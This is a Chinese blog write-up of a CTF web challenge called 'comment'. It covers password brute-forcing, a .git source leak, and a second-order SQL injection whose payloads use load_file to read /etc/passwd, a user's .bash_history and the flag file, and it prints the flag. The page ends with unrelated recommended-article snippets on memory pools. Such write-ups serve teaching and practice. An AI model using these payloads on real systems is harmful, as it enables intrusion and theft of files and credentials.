攻防世界高手进阶之Web comment

最新推荐文章于 2025-03-05 22:36:30 发布
最新推荐文章于 2025-03-05 22:36:30 发布
阅读量1.6k 收藏 2
点赞数 1
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43093631/article/details/106650625
版权

攻防世界高手进阶之Web comment

这题我在网上没找到Writeup,所有花了8金币买的。
这题主要考点
爆破
git泄露
代码审计
SQL注入
登陆页面
可以看到账号框账号为:zhangwei 密码为zhangwei***
所以需要爆破zhangwei后面的三位数,我当时没想到这点看wp才明白的
user:zhangwei pass:zhangwei666
然后扫描目录的时候发现.git文件然后应该是有git源码泄露,过扫描发现到一个write_do.php文件
在这里插入图片描述
登陆成功后看到可以发帖加上题目提示sql,猜测应该是sql注入
在这里插入图片描述
后面的就是看着wp做的
刚才发现一篇文章讲解的非常不错,也让明白了更多,貌似是下载的write_do.php代码不是很完整这也让明白了一些之前的疑惑

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

参考:2018网鼎杯 三道web题 记录~~(二次注入)
在这里插入图片描述
这里也解释了为什么后面要在提交留言输入*/#,因为不是单行所以需要多行注释
查询passwd;’,content=(select load_file(’//etc/passwd’)),/*
在这里插入图片描述
提交留言*/#来闭合注入语句
在这里插入图片描述
在这里插入图片描述
读取www用户的/bin/bash_history:’,content=(select load_file(’//home/www/.bash_history’)),/*

查询.DS_Store文件:’,content=(select hex(load_file(’//tmp/html/.DS_Store’))),/*

十六进制文件读取
将得到的16进制字符串转换,得到flag文件路径

读取flag文件:’,content=(select hex(load_file(’//var/www/html/flag_8946e1ff1ee3e40f.php’))),/*
将得到的16进制字符串转换,得到flag## 新的改变
在这里插入图片描述
$flag=“flag{0dd14aae81d94904b3492117e2a3d4df}”;

项目实战】—— 高并发内存池
机会是给有准备的人
08-01 1882
高并发内存池是一种专门设计用于高并发环境下的内存管理机制。它的原型是Google的一个开源项目tcmalloc,全称,实现了高效的多线程内存管理,用于替换系统的内存分配相关函数malloc和free。在高并发系统中,大量的线程或进程可能会频繁地申请和释放小块的内存,这种情况下,传统的内存分配方式(如使用操作系统的malloc和free)可能会因为频繁的系统调用、锁竞争和内存碎片等问题而导致性能瓶颈。预先分配内存。
C++项目——高并发内存池
hu_143的博客
07-28 1331
项目参考了谷歌 tcmalloc 设计模式,设计实现高并发内存池
“深入浅出”系列之Linux篇:(7)高并发内存池tcmalloc
weixin_65589140的博客
03-05 1112
我们写的这个高并发内存池是google公司开源的一个叫tcmalloc的项目,tcmalloc全称 Thread-Caching Malloc,即线程缓存的malloc,实现了高效的多线程内存管理,用于替代系统的内存分配相关的函数如malloc、free,它的知名度也是非常高的,不少公司都在用它,甚至Go语言直接用它做了自己内存分配器。这个项目是把tcmalloc最核心的框架简化后拿出来,模拟实现出一个自己的高并发内存池,目的就是学习tcamlloc的精华,通过这个项目实现学习C++高手的设计思路。
项目高并发内存池
qq_49613557的博客
03-15 4258
模拟实现出一个自己的高并发内存池,在多线程环境下缓解了锁竞争问题,相比于malloc/free效率提高了25%左右,将内存碎片保持在10%左右。
【实战项目高并发内存池
qq_56663697的博客
05-07 1203
文章目录项目介绍内存池技术设计一个定长的内存池高并发内存池整体框架设计thread cachethread cache整体框架threadcache哈希桶映射对齐规则thread cache申请内存 项目介绍 当前项目实现一个高并发内存池,他的原型是google的一个开源项目tcmalloc,tcmalloc全称Thread-Caching Malloc,即线程缓存的malloc,实现了高效的多线程内存管理,用于替代系统的内存分配相关的函数(malloc、free)。 这个项目是把tcmalloc最核
高并发内存池项目
代码笔记本
02-25 1237
文章目录1.什么是内存池1.1池化技术1.2内存池1.3内存池主要解决的问题1.4malloc2.设计定长内存池2.1结构设计2.2windows和Linux下直接向堆申请页为单位的大块内存2.3代码实现3.高并发内存池整体框架设计4.高并发内存池——thread cache4.1thread cache整体设计4.2自由链表的哈希桶跟对象大小的映射关系4.2.1理论设计4.2.2计算字节数对应的实际freelist大小4.2.3计算字节数对应的实际哈希桶下标4.3创建thread cache时使用TLS无
C++项目设计高并发内存池.zip
05-28
项目就是把tcmalloc中最核心的框架简化后拿出来,模拟实现出一个mini版的高并发内存池,目的就是学习tcmalloc的精华。该项目主要涉及C/C++数据结构(链表、哈希桶)、操作系统内存管理、单例模式、多线程、互斥...
基于TCMalloc原理的C++高并发内存池设计源码
09-29
基于TCMalloc原理的C++高并发内存池设计源码的知识点包括以下几个方面: 首先,TCMalloc(Thread-Caching Malloc)是Google开发的一款内存分配器,相比传统的glibc库中的malloc函数,TCMalloc在多线程环境下有显著...
项目实战】高并发内存池
2021级大一程序白一枚,记录学习的每一步的脚印
09-17 1867
当前项目实现一个高并发内存池,他的原型是google的一个开源项目tcmalloc,tcmalloc全称hread-Caching Malloc,即线程缓存的malloc,实现了高效的多线程内存管理,用于替代系统的内存分配相关的函数(malloc、free)。 我们这个项目是把tcmalloc最核心的框架简化后拿出来,模拟实现出一个自己的高并发内存池,目的就 是学习tcamlloc的精华,这种方式有点类似我们之前学习STL容器的方式。但是相比STL容器部分,tcmalloc的代码量
项目高并发内存池
YIUECHEN的博客
02-12 380
优点 在多核多线程的开发环境下申请内存,必然存在锁竞争问题。所以实现高并发内存池需考虑以下问题: 内存碎片问题 性能问题 多核多线程环境下的锁竞争问题 结构 高并发内存池主要又以下三个部分构成: ThreadCache CentralCache PageCache ...
项目设计高并发内存池(Concurrent Memory Pool)
bang___bang_的博客
09-02 2840
这是一个对谷歌开源项目TCmalloc的简化学习,并自己实现一个高并发内存池,小于256Kb的内存大小通过三层缓存获取,大于256Kb但小于128页的内存大小通过页缓存直接获取,大于128页的内存大小向系统堆申请空间,并与malloc进行性能对比,使用基数树进行性能优化。 技术点:C++、哈希桶、链表、单例模式、多线程、互斥锁、操作系统内存管理等知识。
高并发内存池项目(concurrent memory pool)
qq_41219243的博客
07-28 1846
一、高并内存池概念 内存池(Memory Pool) 是一种动态内存分配与管理技术。 通常情况下,程序员习惯直接使用 new、delete、malloc、free 等API申请分配和释放内存,这样导致的后果是:当程序长时间运行时,由于所申请内存块的大小不定,频繁使用时会造成大量的内存碎片从而降低程序和操作系统的性能。内存池则是在真正使用内存之前,先申请分配一大块内存(内存池)留作备用,当程序员申请内存时,从池中取出一块动态分配,当程序员释放内存时,将释放的内存再放入池内,再次申请池可以 再取出来使用,并尽
C++项目高并发内存池
QiHai的博客
04-12 1821
本篇博客大致记录基于tcmalloc实现高并发内存池的思想与实现方案。
【实战项目高并发内存池(模拟实现mini_tcmalloc)
m0_60416282的博客
08-30 1616
当前项目实现一个高并发内存池,他的原型是google的一个开源项目tcmalloc
项目:手把手实现高并发内存池
weixin_61857742的博客
03-05 1622
高并发内存池(ConCurrentMemoryPool),其原型是google的开源项目tcmalloc。全称是thread-cache-malloc,即线程缓存malloc。应用场景是多线程环境下管理内存,相较于malloc库函数而言,tcmalloc效率更高,多线程环境下完全可以替代malloc。其中go语言直接用tcmalloc作为内存分配器。本项目实现了tcmalloc最核心的功能,可以理解为简化版tcmalloc。
实现一个高并发内存池
HanSion.Z
02-23 5133
高并发内存池1.什么是内存池1.1 池化技术1.2 关于内存池2.内存碎片问题2.1 内碎片2.2 外碎片3.为什么要使用内存池4.三种内存池的演变4.1 最简单的内存分配器4.2 定长内存分配器4.3 Hash映射的多种定长内存分配器5.了解malloc底层原理6. 实现高并发内存池6.1 高并发内存池设计6.2 设计ThreadCache类6.3 自由链表大小设计(对齐规则)6.4 Cent...
高并发内存池
最新发布
03-08
### 高并发场景中的内存池设计与优化 #### 设计原则 在高并发环境中,内存池通过预先分配大块内存来减少频繁的系统调用开销并控制内存碎片化。这种机制显著提高了多线程应用下的内存管理和释放速度[^1]。 #### 实现方式 为了适应不同应用场景的需求,内存池可以根据具体业务逻辑定制其内部结构: - **固定大小对象池**:适用于所有对象具有相同尺寸的情况。这种方式简化了内存管理流程,因为每次只需处理预定义长度的数据单元即可。 - **可变大小对象池**:当应用程序涉及多种类型的对象时,则需构建支持任意尺寸数据存储的能力。此时可通过链表或其他高效查找算法维护多个分区,每个分区负责特定范围内的对象实例创建和销毁操作。 ```cpp class MemoryPool { public: void* allocate(size_t size); bool deallocate(void *ptr); private: std::vector<Chunk*> chunks_; // 存储已划分好的内存片段列表 }; ``` #### 优化策略 针对高并发特性进一步改进内存池表现的方法包括但不限于以下几个方面: - **无锁编程模型**:利用原子指令代替传统互斥锁,在保证线程安全的同时极大程度降低了同步成本。对于某些热点路径还可以考虑引入读写分离机制以提升整体吞吐量。 - **本地缓存层**:为每一个工作线程配备独立的小型缓冲区用于临时存放待分配/回收的对象地址,以此减少全局资源竞争带来的延迟影响。 - **快速失败检测**:一旦发现当前节点无法满足新的内存请求就立即返回错误码给上游模块而不是长时间等待其他组件完成相应动作;这有助于及时止损并将压力分散到整个集群当中去。 - **自适应调整参数**:依据实时监控指标动态调节初始容量、增长因子等配置项,确保即使面对突发流量冲击也能保持稳定的服务质量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值